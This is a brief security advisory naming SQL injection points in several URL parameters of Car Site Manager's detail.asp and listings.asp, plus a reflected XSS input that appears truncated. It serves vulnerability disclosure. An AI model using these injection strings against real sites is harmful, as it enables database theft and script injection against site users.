Car Site Manager [injection sql & xss (get)] vendor site:http://www.mginternet.com/ product:Car Site Manager bug:injection sql risk:medium injection sql : http://site.com/csm/asp/detail.asp?l=&p='[sql] http://site.com/csm/asp/listings.asp?l='[sql] http://site.com/csm/asp/listings.asp?s=search&typ='[sql] http://site.com/csm/asp/listings.asp?s=search&typ=4&loc='[sql] xss (get): http://site.com/csm/asp/listings.asp?s='"> laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com